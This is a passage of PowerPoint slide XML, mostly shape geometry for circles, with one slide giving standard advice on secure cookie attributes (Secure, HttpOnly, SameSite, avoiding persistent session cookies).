                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362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650486" y="6974585"/>
              <a:ext cx="459105" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="459104" h="459104">
                  <a:moveTo>
                    <a:pt x="229362" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="183153" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="458723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458724" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22936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650486" y="6974585"/>
              <a:ext cx="459105" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="459104" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229361"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4662" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458724" y="229361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454061" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440691" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419538" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="391525" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="357576" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318617" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="275570" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229362" y="458723"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183153" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140106" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101147" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67198" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39185" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18032" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4662" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229361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467350" y="4383786"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="228600" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="466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467350" y="4383786"/>
              <a:ext cx="457200" cy="459105"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="457200" h="459104">
                  <a:moveTo>
                    <a:pt x="0" y="229362"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4644" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="4662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="18032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="39185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="67198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="101147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="140106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="183153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457200" y="229362"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452555" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="439233" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418154" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390239" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="356406" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317575" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274666" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228600" y="458724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182533" y="454061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139624" y="440691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100793" y="419538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66960" y="391525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39045" y="357576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17966" y="318617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4644" y="275570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="229362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513070" y="58407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17BE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513070" y="58407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800225" y="1816760"/>
            <a:ext cx="13058140" cy="58007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55445" marR="5080" indent="-1643380">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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web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applications,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special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attention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must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paid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secure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cookies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options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HTTP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response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header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security.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Some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key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parameters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SetCookie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header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are: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0">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3674110">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Avoid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using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persistent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cookies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session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authentication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3150">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4349750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Set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secure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attribute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prevent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cookie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being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sent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over</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4349750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef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unencrypted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HTTP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750">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4415790">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Set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HttpOnly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attribute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make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cookie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inaccessible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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="4415790">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pP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document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object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model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client-side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scripting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Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="3674110" marR="1151255">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
            </a:pP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Use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same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site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attribute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control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from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where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cookie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may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sent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,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miti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7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quest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fo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gery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cks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854707" y="3810000"/>
            <a:ext cx="3134995" cy="3134995"/>
            <a:chOff x="1854707" y="3810000"/>
            <a:chExt cx="3134995" cy="3134995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1854707" y="3810000"/>
              <a:ext cx="3134995" cy="3134995"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3134995" h="3134995">
                  <a:moveTo>
                    <a:pt x="1567433" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1519515" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471954" y="2860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424771" y="6405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1377986" y="11333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331621" y="17623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285695" y="25254"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240230" y="34207"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195245" y="44459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150761" y="55992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106798" y="68785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063378" y="82816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020520" y="98066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978246" y="114515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936575" y="132140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="895528" y="150923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="855125" y="170842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815388" y="191878"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776336" y="214009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737991" y="237215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700372" y="261475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663500" y="286770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627395" y="313078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592079" y="340379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557571" y="368653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523893" y="397879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491064" y="428036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459105" y="459105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428036" y="491064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397879" y="523893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368653" y="557571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340379" y="592079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313078" y="627395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286770" y="663500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261475" y="700372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237215" y="737991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214009" y="776336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191878" y="815388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170842" y="855125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150923" y="895528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132140" y="936575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114515" y="978246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98066" y="1020520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82816" y="1063378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68785" y="1106798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55992" y="1150761"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44459" y="1195245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34207" y="1240230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25254" y="1285695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17623" y="1331621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11333" y="1377986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6405" y="1424771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2860" y="1471954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="1519515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1567434"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="1615352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2860" y="1662913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6405" y="1710096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11333" y="1756881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17623" y="1803246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25254" y="1849172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34207" y="1894637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44459" y="1939622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55992" y="1984106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68785" y="2028069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82816" y="2071489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98066" y="2114347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114515" y="2156621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132140" y="2198292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150923" y="2239339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170842" y="2279742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191878" y="2319479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214009" y="2358531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237215" y="2396876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261475" y="2434495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286770" y="2471367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313078" y="2507472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340379" y="2542788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368653" y="2577296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397879" y="2610974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428036" y="2643803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459105" y="2675762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="491064" y="2706831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523893" y="2736988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557571" y="2766214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="592079" y="2794488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627395" y="2821789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663500" y="2848097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700372" y="2873392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737991" y="2897652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776336" y="2920858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815388" y="2942989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="855125" y="2964025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="895528" y="2983944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936575" y="3002727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="978246" y="3020352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020520" y="3036801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1063378" y="3052051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106798" y="3066082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150761" y="3078875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1195245" y="3090408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1240230" y="3100660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285695" y="3109613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1331621" y="3117244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1377986" y="3123534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424771" y="3128462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471954" y="3132007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1519515" y="3134149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1567433" y="3134868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1615352" y="3134149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662913" y="3132007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710096" y="3128462"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756881" y="3123534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1803246" y="3117244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1849172" y="3109613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894637" y="3100660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1939622" y="3090408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984106" y="3078875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2028069" y="3066082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071489" y="3052051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2114347" y="3036801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2156621" y="3020352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2198292" y="3002727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2239339" y="2983944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2279742" y="2964025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2319479" y="2942989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2358531" y="2920858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2396876" y="2897652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2434495" y="2873392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2471367" y="2848097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2507472" y="2821789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2542788" y="2794488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577296" y="2766214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2610974" y="2736988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2643803" y="2706831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2675762" y="2675762"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2706831" y="2643803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736988" y="2610974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2766214" y="2577296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2794488" y="2542788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2821789" y="2507472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2848097" y="2471367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2873392" y="2434495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2897652" y="2396876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2920858" y="2358531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2942989" y="2319479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2964025" y="2279742"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2983944" y="2239339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3002727" y="2198292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3020352" y="2156621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3036801" y="2114347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3052051" y="2071489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066082" y="2028069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3078875" y="1984106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3090408" y="1939622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3100660" y="1894637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3109613" y="1849172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3117244" y="1803246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123534" y="1756881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128462" y="1710096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3132007" y="1662913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134149" y="1615352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134868" y="1567434"/>
